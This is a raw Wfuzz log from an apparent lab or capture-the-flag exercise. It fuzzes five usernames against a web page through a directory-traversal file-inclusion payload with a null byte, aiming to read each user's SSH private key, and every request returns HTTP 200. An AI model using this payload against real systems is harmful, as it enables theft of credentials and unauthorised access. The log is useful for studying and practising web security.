********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.88.220/index.php?page=../../../../../../home/FUZZ/.ssh/id_rsa%00
Total requests: 5

=====================================================================
ID        [0m   Response[0m   Lines [0m   Word    [0m   Chars    [0m   Payload                                                                                                                                                                     [0m
=====================================================================

000000001:[0m   [32m200     [0m   58 L  [0m   145 W   [0m   1639 Ch  [0m   "patrick"                                                                                                                                                                   [0m
[0K[1A[0K000000003:[0m   [32m200     [0m   58 L  [0m   145 W   [0m   1633 Ch  [0m   "andy"                                                                                                                                                                      [0m
[0K[1A[0K000000002:[0m   [32m200     [0m   58 L  [0m   145 W   [0m   1641 Ch  [0m   "jennifer"                                                                                                                                                                  [0m
[0K[1A[0K000000004:[0m   [32m200     [0m   58 L  [0m   145 W   [0m   1631 Ch  [0m   "amy"                                                                                                                                                                       [0m
[0K[1A[0K000000005:[0m   [32m200     [0m   58 L  [0m   145 W   [0m   1635 Ch  [0m   "loren"                                                                                                                                                                     [0m
[0K[1A[0K
Total time: 0
Processed Requests: 5
Filtered Requests: 5
Requests/sec.: 0

